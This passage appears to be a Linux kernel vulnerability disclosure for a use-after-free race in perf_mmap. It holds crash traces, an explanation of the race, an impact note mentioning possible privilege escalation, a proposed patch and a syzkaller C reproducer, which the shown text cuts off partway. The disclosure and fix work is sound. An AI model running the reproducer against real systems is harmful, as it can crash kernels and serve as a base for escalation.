audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
---------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. The immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, but the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage the UAF to perform heap grooming; if the freed memory is reallocated with a controlled structure, this could potentially be exploited to achieve local privilege escalation. That makes this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
-----
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
